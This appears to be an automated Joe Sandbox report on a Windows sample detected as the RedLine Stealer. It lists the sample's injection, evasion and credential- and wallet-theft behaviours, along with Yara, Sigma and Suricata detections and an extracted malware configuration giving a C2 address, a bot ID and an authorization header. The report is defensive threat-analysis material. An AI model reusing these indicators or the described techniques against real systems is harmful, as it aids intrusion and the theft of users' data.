Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
m5804Te9Uw.exe

Overview

General Information

Sample name:m5804Te9Uw.exe
renamed because original name is a hash value
Original sample name:02701f8d91714c583decdd43635ff407.exe
Analysis ID:1575807
MD5:02701f8d91714c583decdd43635ff407
SHA1:855b8eeffcd217735d1ba6395bbb6647140ecca4
SHA256:41ba86941c72b5e160359e4b851251350958ca56e1d5aa897f0917eb51c5bd2e
Tags:exeuser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected RedLine Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • m5804Te9Uw.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\m5804Te9Uw.exe" MD5: 02701F8D91714C583DECDD43635FF407)
    • svchost.exe (PID: 7536 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • 2FDD.tmp.ssg.exe (PID: 1184 cmdline: "C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exe" MD5: 7B6730CA4DA283A35C41B831B9567F15)
        • 443320E440F81953448019.exe (PID: 1240 cmdline: "C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe" MD5: 02701F8D91714C583DECDD43635FF407)
          • svchost.exe (PID: 6128 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • audiodg.exe (PID: 5828 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
          • msiexec.exe (PID: 6252 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
        • 5B34.tmp.zx.exe (PID: 560 cmdline: "C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe" MD5: BB0BE25BDD2121FA0BDDF6AC59D4FA8D)
          • 5B34.tmp.zx.exe (PID: 1732 cmdline: "C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exe" MD5: BB0BE25BDD2121FA0BDDF6AC59D4FA8D)
        • 443320E440F81953448019.exe (PID: 7796 cmdline: "C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe" MD5: 02701F8D91714C583DECDD43635FF407)
          • svchost.exe (PID: 332 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • audiodg.exe (PID: 1256 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
          • msiexec.exe (PID: 1840 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
    • audiodg.exe (PID: 7556 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
    • msiexec.exe (PID: 7584 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000009.00000000.1356438297.0000000000332000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000007.00000003.1353048341.000000000A4FB000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000009.00000002.1565155068.00000000027C2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: explorer.exe PID: 3968JoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Process Memory Space: 2FDD.tmp.ssg.exe PID: 1184JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 1 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  9.0.2FDD.tmp.ssg.exe.330000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

                    Sigma Signatures

                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\m5804Te9Uw.exe, ProcessId: 7428, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services
                    Sigma detected: Remote Thread Creation By Uncommon Source Image
                    Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\msiexec.exe, SourceProcessId: 7584, StartAddress: B2F0000, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3968
                    Sigma detected: Uncommon Svchost Parent Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\m5804Te9Uw.exe", ParentImage: C:\Users\user\Desktop\m5804Te9Uw.exe, ParentProcessId: 7428, ParentProcessName: m5804Te9Uw.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 7536, ProcessName: svchost.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\m5804Te9Uw.exe", ParentImage: C:\Users\user\Desktop\m5804Te9Uw.exe, ParentProcessId: 7428, ParentProcessName: m5804Te9Uw.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 7536, ProcessName: svchost.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-16T10:42:54.378137+010020432341A Network Trojan was detected185.81.68.1471912192.168.2.1049729TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-16T10:42:53.942813+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:42:59.423340+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:00.138154+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:00.617945+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:01.059974+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:01.497396+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:01.979247+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:02.636828+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:03.246601+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:03.269302+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:03.706057+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:04.144847+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:04.633490+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:05.893540+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:06.458897+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:06.898848+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:07.344742+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:07.783126+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:08.262092+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:08.305702+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:08.773149+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:09.425876+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:09.546043+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:10.921766+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:11.357051+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    2024-12-16T10:43:11.884559+010020432311A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-16T10:42:59.862854+010020460561A Network Trojan was detected185.81.68.1471912192.168.2.1049729TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-16T10:42:50.047397+010020197142Potentially Bad Traffic192.168.2.1049717185.81.68.14780TCP
                    2024-12-16T10:42:52.717879+010020197142Potentially Bad Traffic192.168.2.1049723185.81.68.14780TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-16T10:42:53.942813+010020460451A Network Trojan was detected192.168.2.1049729185.81.68.1471912TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeReversingLabs: Detection: 91%
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeReversingLabs: Detection: 33%
                    Source: C:\Users\user\AppData\Local\Temp\6556.tmp.update.exeReversingLabs: Detection: 55%
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeReversingLabs: Detection: 55%
                    Multi AV Scanner detection for submitted file
                    Source: m5804Te9Uw.exeReversingLabs: Detection: 55%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\6556.tmp.update.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: m5804Te9Uw.exeJoe Sandbox ML: detected
                    Source: m5804Te9Uw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1473564220.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1474211536.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469497436.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1468690442.000002271234F000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.15.dr
                    Source: Binary string: ucrtbase.pdb source: 5B34.tmp.zx.exe, 00000010.00000002.1503509071.00007FF821D65000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1470639846.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469170594.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1468185228.000002271234F000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.15.dr
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1472486975.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1473307417.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1474398082.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 5B34.tmp.zx.exe, 00000010.00000002.1503772095.00007FF838B71000.00000002.00000001.01000000.0000000D.sdmp, _ctypes.pyd.15.dr
                    Source: Binary string: System.ServiceModel.pdbM source: 2FDD.tmp.ssg.exe, 00000009.00000002.1563736477.0000000000893000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469998657.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1472768414.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1472179361.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1467567529.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1473175992.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469281301.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: vcruntime140.amd64.pdbGCTL source: 5B34.tmp.zx.exe, 0000000F.00000003.1466980210.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 00000010.00000002.1503915933.00007FF838B8E000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1471540629.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1468905252.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32werShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VSF{ source: 2FDD.tmp.ssg.exe, 00000009.00000002.1578947038.0000000005DA8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469382930.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1473051099.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271234F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1471791567.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ucrtbase.pdbUGP source: 5B34.tmp.zx.exe, 00000010.00000002.1503509071.00007FF821D65000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: vcruntime140.amd64.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1466980210.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 00000010.00000002.1503915933.00007FF838B8E000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1475003812.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469853678.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1472338208.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1471406711.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469030225.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1472917805.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 5B34.tmp.zx.exe, 00000010.00000002.1502931530.00007FF8208FD000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1470411305.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1473757225.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1471673096.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1471282238.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1475221176.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1471929905.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1472628734.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1472046317.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469619006.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1474064387.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1470275647.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1470146693.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.0000022712359000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1473423503.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1474753220.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAD85A0 FindFirstFileExW,FindClose,15_2_00007FF79DAD85A0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAD79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,15_2_00007FF79DAD79B0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 15_2_00007FF79DAF0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_00007FF79DAF0B84
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAD85A0 FindFirstFileExW,FindClose,16_2_00007FF79DAD85A0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAD79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00007FF79DAD79B0
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF79DAF0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_00007FF79DAF0B84
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821D23280 FindFirstFileExW,FindNextFileW,FindClose,16_2_00007FF821D23280
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821D2303C FindFirstFileExW,FindNextFileW,FindClose,16_2_00007FF821D2303C
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 4x nop then jmp 06992790h9_2_06992298
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 4x nop then jmp 06B6146Bh9_2_06B61238

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.10:49729 -> 185.81.68.147:1912
                    Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.10:49729 -> 185.81.68.147:1912
                    Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.81.68.147:1912 -> 192.168.2.10:49729
                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.81.68.147:1912 -> 192.168.2.10:49729
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\explorer.exeNetwork Connect: 185.81.68.147 80Jump to behavior
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 185.81.68.147:1912
                    Source: global trafficTCP traffic: 192.168.2.10:49729 -> 185.81.68.147:1912
